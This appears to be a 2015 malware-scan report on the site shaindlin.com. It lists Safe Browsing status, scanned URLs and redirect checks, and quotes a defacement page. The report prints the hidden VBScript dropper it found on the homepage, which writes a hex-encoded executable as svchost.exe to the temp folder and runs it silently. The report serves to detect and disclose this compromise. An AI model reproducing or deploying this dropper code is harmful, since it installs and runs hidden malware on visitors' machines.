Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shaindlin.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shaindlin.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:50 GMT Location: http://www.shaindlin.com/ Server: Apache Vary: Accept-Encoding Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/ | 200 OK Content-Length: 117148 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: [#] HacKeD By Killer~X [#] <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- saved from url=(0027)http://cz-aquaproducts.com/ --> <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta http-equiv="Content-Language" content="en-us"> <title>[#] HacKeD By Killer~X [#]</title> <!--<base href="https://twitter.com/ClaXHacK">--><base href="."> <meta name="description" content="hacked by Killer~X :~ twitter: ClaxHacK"> <meta name="keywords" content="hacked by Killer~X - Killer~X - Killer~X - "> <script type="text/javascript" src="./111_files/gsrs"></script><style type="text/css"></st ...[117381 bytes skipped]... | ||
http://www.shaindlin.com/./111_files/gsrs | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.shaindlin.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/clickbinder.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:53 GMT Location: http://www.shaindlin.com/111_files/clickbinder.do Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/clickbinder.do | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getSnoozing.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:54 GMT Location: http://www.shaindlin.com/111_files/getSnoozing.do Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getsnoozing.do | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getJsonAds | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:55 GMT Location: http://www.shaindlin.com/111_files/getJsonAds Server: Apache Vary: Accept-Encoding Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getjsonads | 404 Not Found Content-Length: 337 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/nocoverage.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:55 GMT Location: http://www.shaindlin.com/111_files/nocoverage.do Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/nocoverage.do | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getJsonAds(1) | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:56 GMT Location: http://www.shaindlin.com/111_files/getJsonAds(1) Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getjsonads(1) | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
https://static.publikeco00.publikeco.com/apps/boot/boot-start.js?cb=8 | 200 OK Content-Length: 1534 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shaindlin.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 13 Oct 2015 18:33:50 GMT
Location: http://www.shaindlin.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
GET / HTTP/1.1
Host: shaindlin.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 13 Oct 2015 18:33:50 GMT
Location: http://www.shaindlin.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shaindlin.com
Referer: http://www.google.com/search?q=shaindlin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shaindlin.com
Referer: http://www.google.com/search?q=shaindlin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.